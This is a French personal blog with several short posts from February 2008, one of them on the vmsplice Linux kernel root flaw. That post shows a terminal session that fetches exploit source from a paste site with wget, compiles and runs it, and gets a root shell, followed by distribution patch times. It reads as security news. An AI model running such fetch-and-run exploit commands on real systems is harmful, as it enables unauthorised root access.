fév 22 2008

À dans sept jours !

Je pars demain à Samoëns pendant une semaine, je reviens donc le samedi 1er mars, en fin d’après-midi.

7 jours sans internet, et donc sans articles sur ce blog (vous avez déjà essayé de vous connecter en pleine montagne ?). Ça risque d’être génial ; il n’y a plus de neige :D .

Vue l’affluence record de ce blog, je me permet de ne pas désactiver les commentaires (en espérant le retrouver dans un état normal à mon retour ;) ). Pour ceux que ça intéresse, voilà l’itinéraire.

« I’ll be back ! », comme dirait terminator…

aucun commentaire

fév 20 2008

Hardy+1 sera Intrepid Ibex !

And so I’d like to introduce you to the Intrepid Ibex, the release
which is planned for October 2008, and which is likely to have the
version number 8.10.

Dans ce mail, envoyé à 15H08 GMT à la liste de diffusion ubuntu-devel, Mark nous apprend le nom de la version qui succédera à Hardy Heron : Intrepid Ibex !

Bouquetin

Le bouquetin intrépide sera donc la mascotte de la version 8.10, qui devrait sortir en octobre 2008.

aucun commentaire   |  mots-clés : , | posté dans Informatique, Logiciels Libres

fév 19 2008

Faille dans le noyau Linux.

Une importante faille de sécurité à été découverte dans le noyau Linux, le vendredi 8 février. Elle permet à un simple utilisateur d’obtenir les privilèges root en exploitant l’appel système splice(). Cette faille concerne les versions 2.6.17 à 2.6.24.1 du noyau.

La faille

L’appel systèmes vmsplice() a été introduit dans la version 2.6.17 du noyau, il permet d’échanger des données entre deux descripteurs de fichiers. La faille provient de l’absence de vérification des paramètres envoyés aux fonctions vmsplice_to_user(), copy_from_user_mmap_sem() et get_iovec_page_array() de fs/splice.c.

Cette faille permet à un utilisateur local d’obtenir les privilèges root, comme le montre ce proof of concept :

nicoz@ForteresseDigitale:~$ wget http://paste.ubuntu-nl.org/55587/plain/ -O vmsplice_exploit.c
--13:58:10-- http://paste.ubuntu-nl.org/55587/plain/
=> `vmsplice_exploit.c'
Résolution de paste.ubuntu-nl.org... 81.171.100.21
Connexion vers paste.ubuntu-nl.org|81.171.100.21|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Longueur: non spécifié [text/plain]

[ <=> ] 7 336 --.--K/s

13:58:10 (61.63 KB/s) - « vmsplice_exploit.c » sauvegardé [7336]

nicoz@ForteresseDigitale:~$ gcc -o vmsplice_exploit vmsplice_exploit.c
nicoz@ForteresseDigitale:~$ ./vmsplice_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e13000 .. 0xb7e45000
[+] root
root@ForteresseDigitale:~#

Réactions

La version 2.6.24.2, qui corrige cette faille, a été publiée le dimanche 10 février. La première distribution Linux à fixer ce bug a été Debian, le 11 février à 13H58. DistroWatch propose un tableau récapitulant le temps de réaction des distributions ;

Distribution Date / Heure Délais Référence
Debian GNU/Linux 11-02-2008 13:58 +0 heure DSA 1494-1
Fedora 11-02-2008 22:39 +8 heures FEDORA-2008-1423
Slackware Linux 12-02-2008 02:00 +12 heures SSA:2008-042-01
Mandriva Linux 12-02-2008 07:06 +19 heures MDVSA-2008:043
Frugalware Linux 12-02-2008 11:17 +21 heures FSA-369
openSUSE 12-02-2008 12:43 +23 heures SUSE-SA:2008:007
rPath Linux 12-02-2008 16:28 +26 heures rPSA-2008-0052-1
Red Hat Enterprise Linux 12-02-2008 16:54 +27 heures RHSA-2008:0129-01
Ubuntu 12-02-2008 17:23 +27 heures USN-577-1
CentOS 13-02-2008 03:27 +37 heures CESA-2008:012

On remarque que la correction du bug a été rapide, à la hauteur du danger que représentait cette faille.

Pour en savoir plus ;

aucun commentaire   |  mots-clés : , , , | posté dans Informatique, Logiciels Libres

fév 16 2008

Le retour !

Après presque trois mois d’inactivité, nicoz.olympe-network.fr est enfin de retour. Le brusque piratage du service d’hébergement olympe-network, en novembre, a été autant destructeur qu’imprévu ; je n’avais aucun moyen de vous prévenir. J’ai aussi perdu quelques articles, cependant la majorité ont été récupérés sur l’ancien blog DotClear, nic0z.123.fr (je n’ai « sélectionné » que ceux auxquels je tiens le plus). Le blog est de nouveau fonctionnel, toujours sous WordPress (on ne change pas une équipe qui gagne !), avec le même thème qu’avant (garland), dont les sidebars ont été légèrement modifiées par rapport à avant le piratage (ajout d’un nuage de tags et d’espaces entre les widgets, notamment).

J’admire aussi le courage et la force de l’équipe d’Olympe-Network, qui continue de nous proposer un hébergement de qualité accessible à tous malgré l’ignoble piratage dont le site été victimes. Il est bien rare de trouver des services comme Olympe, ouverts et chaleureux.

Toujours est-il que je suis de retour !

1 commentaire   |  mots-clés :